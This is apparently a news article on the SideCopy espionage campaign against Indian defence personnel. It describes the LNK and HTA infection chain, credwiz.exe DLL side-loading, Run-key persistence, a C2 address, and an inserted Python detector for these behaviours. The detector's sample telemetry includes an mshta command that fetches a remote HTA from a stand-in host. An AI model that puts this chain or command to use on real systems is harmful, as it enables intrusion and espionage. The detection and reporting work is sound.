
Cybersecurity researchers have uncovered fresh evidence of an ongoing cyberespionage campaign against Indian defence units and armed forces personnel, active since at least 2019, that aims to steal sensitive information.
Dubbed "Operation SideCopy" by the Indian cybersecurity firm Quick Heal, the attacks have been attributed to an advanced persistent threat (APT) group that has managed to stay under the radar by "copying" the tactics of other threat actors such as SideWinder.
Exploiting the Microsoft Equation Editor Flaw
The campaign begins with an email carrying a malicious attachment, either a ZIP archive containing an LNK file or a Microsoft Word document, that sets off a multi-step infection chain ending in the download of the final-stage payload.
Besides identifying three different infection chains, the researchers note that one of them combined template injection with the Microsoft Equation Editor flaw (CVE-2017-11882), a 20-year-old memory corruption bug in Microsoft Office that, when exploited successfully, lets attackers execute code remotely on a vulnerable machine even without user interaction.
Microsoft addressed the issue in a patch released in November 2017.
As is often the case with such malspam campaigns, the attack relies on social engineering to get the user to open a Word document that purports to be a genuine document about the Indian government's defence production policy.
In addition, the LNK files carry a double extension ("Defense-Production-Policy-2020.docx.lnk") and use document icons, tricking the unsuspecting victim into opening the file.
Once opened, the LNK files abuse "mshta.exe" to execute malicious HTA (Microsoft HTML Application) files hosted on fraudulent websites; the HTA files are built with an open-source payload generator called CACTUSTORCH.
Multi-Stage Malware Delivery Process

The first-stage HTA file contains a decoy document and a malicious .NET module that opens the decoy and downloads a second-stage HTA file. That second stage checks for the presence of popular antivirus products before copying Microsoft's credential backup and restore utility ("credwiz.exe") to a separate folder on the victim's machine and modifying the registry so that the copied executable runs at every startup.
As a result, when this copy is executed, it not only side-loads the malicious "DUser.dll" but also launches the RAT module "winms.exe", both of which are obtained from the stage-2 HTA.
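As an added example (not code from the article or from the Quick Heal/Seqrite report), the following Python detection logic runs the behaviours described above, a double-extension LNK, mshta.exe fetching a remote HTA, credwiz.exe executing from a non-system folder with DUser.dll side-loaded, and the Run-key persistence, over constructed process telemetry; the event field names, sample paths and the example.invalid URL are assumptions.

```python
import re

# Constructed sample telemetry (not captured from the campaign); field names are assumed.
SAMPLE_EVENTS = [
    {"type": "file", "path": r"C:\Users\v\Downloads\Defense-Production-Policy-2020.docx.lnk"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/stage1.hta"},
    {"type": "process", "image": r"C:\Users\v\AppData\Roaming\x\credwiz.exe", "cmdline": "credwiz.exe"},
    {"type": "image_load", "process": r"C:\Users\v\AppData\Roaming\x\credwiz.exe",
     "module": r"C:\Users\v\AppData\Roaming\x\DUser.dll"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": r"C:\Users\v\AppData\Roaming\x\credwiz.exe"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},  # benign
]

# Directories where the genuine credwiz.exe and DUser.dll normally live.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# A document-looking extension immediately followed by .lnk
DOUBLE_EXT_LNK = re.compile(r"\.(docx?|xlsx?|pptx?|pdf)\.lnk$", re.IGNORECASE)

def _in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule_name, evidence) pairs for the SideCopy-style behaviours."""
    alerts = []
    for e in events:
        kind = e["type"]
        if kind == "file" and DOUBLE_EXT_LNK.search(e["path"]):
            alerts.append(("double_extension_lnk", e["path"]))
        elif kind == "process":
            name = _basename(e["image"])
            if name == "mshta.exe" and re.search(r"https?://", e["cmdline"], re.I):
                alerts.append(("mshta_remote_hta", e["cmdline"]))  # remote HTA fetch
            elif name == "credwiz.exe" and not _in_system_dir(e["image"]):
                alerts.append(("relocated_credwiz", e["image"]))  # copied out of System32
        elif kind == "image_load":
            if _basename(e["module"]) == "duser.dll" and not _in_system_dir(e["module"]):
                alerts.append(("duser_sideload", e["module"]))  # DLL beside the relocated host
        elif kind == "registry" and _basename(e["key"]) == "run":
            if _basename(e["value"]) == "credwiz.exe" and not _in_system_dir(e["value"]):
                alerts.append(("run_key_relocated_credwiz", e["value"]))  # startup persistence
    return alerts

if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

The benign notepad.exe event and a credwiz.exe running from its real System32 location produce no alert, which is the false-positive check a detection engineer would want alongside the positive cases.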
"The DUser.dll will initiate communication with the IP address 173.212.224.110 over TCP port 6102," the researchers said.
"If connected successfully, it will continue [...] and perform various tasks based on the command received from the C2. For example, if the C2 sends 0, it collects the Computer Name, Username, OS version etc. and sends them back to the C2."
Noting the code-level similarities the RAT shares with Allakore Remote, an open-source remote access tool written in Delphi, Quick Heal's Seqrite team observed that the Trojan used Allakore's RFB (remote frame buffer) protocol to exchange data with infected systems.
Possible Links to Transparent Tribe APT
In addition, a few of the attack chains are said to drop a previously unseen RAT (called "Crimson RAT" by Kaspersky researchers) that comes equipped with a wide range of capabilities, including accessing files and clipboard data, controlling processes, and executing arbitrary commands.
Although the way the DLL files are put together resembles the SideWinder group's modus operandi, the APT's heavy reliance on open-source toolkits and its entirely different C2 infrastructure led the researchers to conclude with reasonable confidence that the threat actor is of Pakistani origin, specifically the Transparent Tribe group, which has recently been linked to several attacks on Indian military and government personnel.
“Therefore, we suspect that the actor behind this operation is a sub-group (or part) of the Transparent-Tribe APT group that is simply imitating the TTPs of other threat actors to mislead the security community,” Quick Heal said.